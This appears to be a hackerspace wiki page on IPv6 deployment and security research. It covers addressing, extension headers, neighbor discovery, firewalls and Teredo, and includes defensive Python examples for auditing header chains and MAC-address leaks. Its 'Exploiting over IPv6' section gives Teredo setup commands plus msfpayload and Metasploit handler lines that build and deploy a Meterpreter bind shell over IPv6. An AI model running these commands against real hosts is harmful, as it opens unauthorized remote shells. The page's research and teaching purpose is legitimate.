====== IPv6 ======
{{template>:project:infobox_remoteimg|
name=IPv6|
image=ipv6-badge-blk-128-trans.png?200|
sw=|
founder=[[user:ruza]]|
interested=[[user:kxt]], [[user:biiter]]|
status=active}}
~~META:
status = active
&relation firstimage = :project:ipv6-badge-blk-128-trans.png
~~
===== Goals of the Project =====
* [[wp>IPv6]] deployment
* education
* security research related to IPv6
===== Status and Plan =====
The project is currently in the planning stage.
* [DONE] our website http://brmlab.cz is accessible on IPv6
==== World IPv6 day (8 June 2011) ====
* [DONE] we participate in World IPv6 day
[[http://isoc.org/wp/worldipv6day/ipv6-enabled-websites/|{{ :project:ipv6-badge-blk-128-trans.png?nolink&200 |}}]]
==== World IPv6 launch (6 June 2012) ====
[[http://www.worldipv6launch.org/|{{ :project:world_ipv6_launch_badge_128.png? }}]]
==== 6or4 checkicon guy for your website ====
Check that your web server supports [[https://httpd.apache.org/docs/current/mod/mod_include.html|SSI]].
  SetEnvIf Server_Addr "^2001:" IPV6
  wget -4 http://www.cznog.eu/images/checkicon.php -O ./images/ipv4.png
  wget -6 http://www.cznog.eu/images/checkicon.php -O ./images/ipv6.png
===== Topics (attack vectors) =====
==== Introduction to IPv6 ====
* [[http://www.oreillynet.com/onlamp/blog/2003/06/what_ever_happened_to_ipv5.html|What ever happened to IPv5?]] [[http://etherealmind.com/what-was-ipv5-version-5-ip/|2]]
* [[http://www.bieringer.de/linux/IPv6/IPv6-HOWTO/IPv6-HOWTO-6.html|quick intro]]
* [[https://wiki.kubuntu.org/IPv6|IPv6 on Ubuntu]] and [[https://wiki.kubuntu.org/IPv6|KUbuntu]]
* [[http://tldp.org/HOWTO/Linux+IPv6-HOWTO/x811.html|IPv6-ready test/debug programs]]
* [[http://labs.ripe.net/Members/gih/testing-teredo|Testing Teredo]] (labs.ripe.net)
==== IPv6 Addressing Architecture ====
* The address notation for IPv6 is a group of 16 2-digit hexadecimal numbers, separated with a ':'; global addresses are allocated by [[wp>IANA]] (IP Address Not Available)
* "::" stands for a string of 0 bits.
* Special addresses are ::1 for loopback
* ::FFFF: for IPv4-mapped-on-IPv6
* fe00::0/8 ip6-localnet
* ff00::0 ip6-mcastprefix
* fe80::/10 link-local unicast
* broadcast -> multicast
Finding IPv6 hosts
* DNS (highly dependent), server logs
* MAC address allocations (EUI-64 standard)
* DoS targets [[http://www.iana.org/assignments/ipv6-multicast-addresses/ipv6-multicast-addresses.xml|1]]
  * 3 site-local multicast addresses
    * FF05::2 all-routers
    * FF05::FB mDNSv6
    * FF05::1:3 all DHCP servers
  * Several link-local multicast addresses
    * FF02::1 all nodes
    * FF02::2 all routers
    * FF02::F all UPnP
    * ... (RFCs :?:)
  * Some deprecated (RFC 3879) site-local addresses but still used
    * FEC0:0:0:FFFF::1 DNS server
http://www.abclinuxu.cz/clanky/architektura-ipv6-adresace-uzlu-1
==== IPv6 Header Fields ====
* [[https://www.ipv6.cz/Form%C3%A1t_datagramu|Datagram format]]
==== IPv6 Extension Headers ====
* unlimited size of header chain DoS aka Routing header DoS vs RFC 5095
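
A filter or IDS has to walk the whole extension header chain before it can see the upper-layer protocol. The sketch below is an added example, not part of the original notes: it walks the chain of a raw packet, flags type 0 Routing headers (deprecated by RFC 5095) and over-long chains. ''MAX_CHAIN'', the function names and the sample packets are assumptions constructed for illustration.

```python
import struct

# Headers walked here: Next Header value -> name (AH/ESP/mobility are left out).
EXT = {0: "hop-by-hop", 43: "routing", 60: "destination options"}
FRAGMENT = 44       # fragment header, fixed 8 bytes
MAX_CHAIN = 8       # assumed local policy limit, not taken from an RFC

def audit_chain(packet: bytes):
    """Walk the extension header chain; return (upper_layer_proto, findings)."""
    if len(packet) < 40 or packet[0] >> 4 != 6:
        return None, ["not an IPv6 packet"]
    nxt, off, seen, findings = packet[6], 40, 0, []
    while nxt in EXT or nxt == FRAGMENT:
        if off + 8 > len(packet):
            return None, findings + ["truncated extension header"]
        seen += 1
        if seen > MAX_CHAIN:
            return None, findings + ["chain longer than %d headers" % MAX_CHAIN]
        # Hdr Ext Len counts 8-octet units beyond the first 8 octets.
        size = 8 if nxt == FRAGMENT else (packet[off + 1] + 1) * 8
        if nxt == 43 and packet[off + 2] == 0:
            findings.append("RH0 (deprecated by RFC 5095), segments left=%d"
                            % packet[off + 3])
        nxt, off = packet[off], off + size
    if off > len(packet):
        return None, findings + ["truncated extension header"]
    return nxt, findings

def ipv6_packet(next_header: int, payload: bytes) -> bytes:
    """Constructed test packet: documentation-prefix addresses, hop limit 64."""
    src = bytes.fromhex("20010db8" + "00" * 11 + "01")
    dst = bytes.fromhex("20010db8" + "00" * 11 + "02")
    return struct.pack("!IHBB", 6 << 28, len(payload), next_header, 64) + src + dst + payload

# Constructed samples: one RH0 with a single address, one chain of 10 padded
# destination-options headers, one packet with no extension headers (59 = none).
RH0 = ipv6_packet(43, bytes([59, 2, 0, 1, 0, 0, 0, 0])
                  + bytes.fromhex("20010db8" + "00" * 11 + "03"))
PADN = [1, 4, 0, 0, 0, 0]
LONG = ipv6_packet(60, b"".join(bytes([60 if i < 9 else 59, 0] + PADN)
                                for i in range(10)))
CLEAN = ipv6_packet(59, b"")

if __name__ == "__main__":
    for name, pkt in (("RH0", RH0), ("LONG", LONG), ("CLEAN", CLEAN)):
        print(name, audit_chain(pkt))
```
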
==== IPv6 Privacy Extensions (RFC 3041) ====
* temporary address for host client application (e.g. www browser)
* random 64bit ID
* can be disabled by Group Policy Object (win) or DHCP
==== IPv6 Options ====
==== IPsec ====
* IPsec not required by IPv6
* blinds IPS, firewalls, ACLs
* network security relies more on endpoint security!
* DoS, malformed packets, spoofed and unprotected IKE messages (ICSA Labs methodology)
==== Internet Control Message Protocol version 6 (ICMPv6) ====
* more relied upon
* moar types
==== Neighbor Discovery for IPv6 ====
* NDP replaces ARP
* not authenticated
* static entries overwritten by dynamic ones
* SEND (SEcure Neighbor Discovery)
==== Multicast Listener Discovery ====
==== Mobility (RFC 3775) ====
* http://natisbad.org/MIPv6/ [TODO]
* IPSEC VPN over IPv6 called [[http://danstoncloud.com/blogs/simplebydesign/archive/2011/10/08/directaccess-in-windows-8-sneak-preview.aspx|Microsoft Direct Access]] (Win 2008 server, Win8)
==== Address Auto-configuration ====
* stateless (SLAAC)
  * rogue Router Advertisement (DoS, MiTM)
  * fe80:: (local link) + MAC (EUI-64)
* stateful DHCPv6, RFC 3315
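
The "fe80:: + MAC (EUI-64)" construction above, and the "MAC address allocations" item under Finding IPv6 hosts, come down to the same mapping: the interface ID is derived from the MAC and can be turned back into it. The following is an added example, not part of the original notes, for checking which of your own addresses still leak a hardware address (i.e. do not use privacy extensions). Function names, the MAC and the sample addresses are constructed for illustration.

```python
import ipaddress

def mac_to_link_local(mac: str) -> str:
    """Modified EUI-64: split the MAC, insert ff:fe, flip the universal/local bit."""
    b = bytes(int(x, 16) for x in mac.split(":"))
    if len(b) != 6:
        raise ValueError("expected a 48-bit MAC address")
    iid = bytes([b[0] ^ 0x02]) + b[1:3] + b"\xff\xfe" + b[3:6]
    return str(ipaddress.IPv6Address(bytes.fromhex("fe80" + "00" * 6) + iid))

def embedded_mac(addr: str):
    """Return the MAC recoverable from an EUI-64 interface ID, else None.

    Heuristic: a random interface ID contains ff:fe in that position with
    probability 1/65536, so treat a hit as "very likely", not proof.
    """
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    mac = bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:8]
    return ":".join("%02x" % x for x in mac)

def hosts_by_mac(addresses):
    """Group addresses by leaked MAC; one MAC under several prefixes is trackable."""
    groups = {}
    for a in addresses:
        groups.setdefault(embedded_mac(a), []).append(a)
    return groups

# Constructed sample: documentation prefix 2001:db8::/32, MAC chosen for illustration.
SAMPLE = [
    "fe80::216:3eff:fe12:3456",
    "2001:db8:a:1:216:3eff:fe12:3456",
    "2001:db8:b:7:216:3eff:fe12:3456",
    "2001:db8:a:1:5c4e:91a7:3b0d:e2f1",   # random ID, as privacy extensions produce
]

if __name__ == "__main__":
    print(mac_to_link_local("00:16:3e:12:34:56"))
    for mac, addrs in hosts_by_mac(SAMPLE).items():
        print(mac, addrs)
```
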
==== Dynamic Host Configuration Protocol version 6 (DHCPv6) ====
==== Application support for IPv6 ====
* [[http://www.getipv6.info/index.php/Customer_problems_that_could_occur]]
==== IPv6 firewalls ====
* ipv6 default policy allowed, not inspected
* many icmp6 types need to be allowed too
* how to build and maintain antispam reputation databases?
* fragmentation and reassembly is done only by the end system
==== Transition/co-existence technologies (6to4, Teredo, ISATAP, etc.) ====
==== Security Implications of IPv6 on IPv4-only networks ====
* when running teredo/miredo, you are using a public IP address :!:
* [[wp>IPv6_brokenness_and_DNS_whitelisting]]
==== Exploiting over IPv6 ====
* [[http://www.uninformed.org/?v=10&a=3|Penetration Testing with IPv6, 10/2008, hdm]]
* you don't want the miredo service to start every time (update-rc.d -f miredo remove).
* Faking IP address FIXME
=== Windows ===
  netsh int ipv6 install
  netsh int ipv6 set teredo [enterpriseclient|client] # (enterpriseclient gives you a public IP)
  netsh int ipv6 show teredo # we need qualified State
  msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=1337 X > bind.exe
  upload bind.exe
  msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
[[http://vimeo.com/15243189]]
==== IPv6 implementation (network devices testing) ====
* [[wp>Comparison_of_IPv6_support_in_routers]]
* [[http://www-x.antd.nist.gov/usgv6/index.html|NIST tested products reports]] (ICSA labs)
===== Papers, books =====
* [[http://www.thc.org/papers/vh_thc-ipv6_attack.pdf|Attacking the IPv6 Protocol Suite, van Hauser, THC]]
* [[http://ipv6-ghent.fi-week.eu/files/2010/12/1300-2-Vyncke.pdf|IPv6 security vendor Point of View, Vyncke, Cisco]]
* 39. Europen.cz, proceedings
* Cisco-Press-IPv6-Security-2009.pdf (@data)
* Cisco.Press.IPv6.for.Enterprise.Networks.Mar.2011.pdf (@data)
* Implementace_IPv6-CZNIC_academy.pdf (@data), [[http://www.nic.cz/akademie/course/18/detail/|CZ NIC akademie]]
* [[http://knihy.nic.cz/files/nic/edice/pavel_satrapa_ipv6_2011.pdf|{{:project:ipv6_book.png}}]]\\ Pavel Satrapa, 2011
===== Links =====
* [[https://www.ipv6.cz/Co_je_IPv6|IPv6 wiki]]
* [[http://knihy.nic.cz/ipv6/|HowTo make IPv6 preferred for teredo/miredo]] (related to [[http://www.akkadia.org/drepper/linux-rfc3484.html|RFC3484]])
* [[http://petrkrcmar.blog.root.cz/2010/10/25/cim-si-vyzkouset-ipv6/|What can you use to try out IPv6?]] (root.cz)
* [[http://www.sixxs.net/wiki/IPv6_Specific_Content_in_Apache|IPv6_Specific_Content_in_Apache]]
* telnet -6 towel.blinkenlights.nl (extra scenes)
===== Tools =====
* [[http://ipv6-test.com/|IPv6 test]] :!:
* [[http://www.thc.org/thc-ipv6/|THC-IPv6]] attack tool
* [[http://www.hart.co.jp/ipv6/ipv6check.php|back{trace,ping} yourself]]
* [[http://ipv6-speedtest.net/]]